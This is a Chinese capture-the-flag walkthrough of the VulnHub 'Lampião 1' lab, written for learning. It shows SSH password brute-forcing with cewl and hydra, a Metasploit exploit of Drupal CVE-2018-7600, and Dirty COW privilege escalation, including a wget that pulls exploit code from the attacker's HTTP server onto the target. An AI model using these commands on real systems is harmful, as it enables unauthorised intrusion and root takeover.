VulnHub-Lampiao-Walkthrough渗透学习

VulnHub-Lampiao-Walkthrough

靶机地址：https://www.vulnhub.com/entry/lampiao-1,249/
靶机难度：简单
靶机发布日期：2018年7月28日
靶机描述：Would you like to keep hacking in your own lab?
Try this brand new vulnerable machine! “Lampião 1”.
目标：得到root权限&找到flag.txt
作者：大余
时间：2019-12-27

请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：

使用命令：nmap -sP 192.168.145.0/24
上一篇GoldenEye-1已经简单介绍了netdiscover的使用，个人比较喜欢用nmap，这边就不介绍了。
我们开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口扫描：

图中可以看出，目标计算机上有三个可用的开放端口22、80、1898端口。这里对22端口，尝试ssh弱口令爆破，并没有结果，这里就不多说ssh弱口令爆破了，基本上百度都能搜得到，使用msf、hydra等，后期文章攻击也会使用到。
由于目标计算机上的端口80可用，我们先来检查下web页面。我们在浏览器上打开了目标计算机的IP，它显示了一个有趣的页面：

这是一个静态页面，我开始检查主页的html内容以获取任何有用的提示（F12查看），nikto扫了没什么发现，gobuster、dirb和御剑扫目录，都没什么发现，半小时过去…尴尬，并没有什么有用的信息…先暂时不管80端口了…
还有个1898端口开启状态，继续访问获取信息。

可以分别进入两个页面：


第一栏点进去内容翻译后并没有什么有效的信息，第二栏点进去细心的我发现了这是node/3，这是第三栏的内容，说明还有第二栏的内容没有显示，修改下页面试试。
audio.m4a
qrc.png
经过长时间终于有点有用的信息了…访问试试


这里发现了一段语音和一个二维码，语音内容为：user tiago，则用户名为：tiago
二维码用微信扫描发现为一句话：Try harder！Muahuahua…并没啥用
这边开始用工具对网站进行爆破扫描…

找到了一个robots.txt文件，后台打开看看

这里经过长时间收集信息，在CHANGELOG.txt文件，发现网站的版本信息：

这是一个基于Drupal 7的博客或是社交网站。

这边在页面没什么收获了，开始用工具进行暴力攻击。
cewl：通过爬行网站获取关键信息创建一个密码字典
hydra：神器九头蛇，网上有太多资料
使用命令：cewl http://192.168.145.148:1898/?q=node/1 -w dayu.txt
hydra -l tiago -P dayu.txt 192.168.145.148 ssh
先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习，然后九头蛇暴力破解得到用户密码：
用户: tiago
密码: Virgulino

使用用户名tiago进行ssh登陆连接，成功连接，但是不能用sudo su进行提权！！

二、提权shell

我们要针对收集到的信息进行提权。
这边收集到了版本是2016年的、Durpal 7。

这边搜索到Drupal漏洞CVE-2018-7600，我们尝试使用MSF进行渗透试试。

运行msfconsole。

这是一种新渗透方法，先查询durpal在MSF中存在哪些漏洞，我们需要使用的是2018年的漏洞，use选择4提取CVE-2018-7600漏洞，show option查询渗透信息，需要填写Rhosts攻击IP，Rport攻击端口。

成功通过漏洞渗透进入系统，获得低权限用户，和前面ssh登陆的tiago用户权限类似，这是另外一种渗透的方法，可以好好学习。
下一步要找到反弹shell获取root权限，通过网上对Durpal 7版本2016年都可以使用dirty（脏牛）进行提权，非常有名的一个漏洞提权目前已经修复，仅供参考学习。

命令：searchsploit dirty查找脏牛提权shell，利用40847.cpp
使用CP进行复制到本地，cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
思路是继续开启本地pthon服务，然后把40847.cp发送到靶机上。

命令：python -m SimpleHTTPServer 5555 开启服务

命令：wget http://192.168.182.135:5555/40847.cpp
将40847.cp上传到靶机上。


命令：g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

1. -Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3. -O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
4. -std=c++11就是用按C++2011标准来编译的
5. -pthread 在Linux中要用到多线程时，需要链接pthread库
6. -o dcow gcc生成的目标文件,名字为dcow
   执行gcc编译可执行文件，可直接提权。
   
   这个靶场还是学到了很多的东西，比如说如何一步一步进行渗透，
   虽说与真实的环境相差甚远，但是最主要了还是用来锻炼自己的能力，
   在本篇的实验中还是存在很多的不足的！还是要靠百度来进行一步一步的探索
   主要还是自己的知识面太窄了，比如说这个脏牛提权，百度才知道…
   看来以后还是要多扩大自己的知识面，前面的都还行，遇上一个实验差不多，
   到了提权这一步就开始花里胡哨，自己就很懵比，就很难受！！！！
   还是要多学习！！

由于我们已经成功得到root权限&找到flag.txt，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。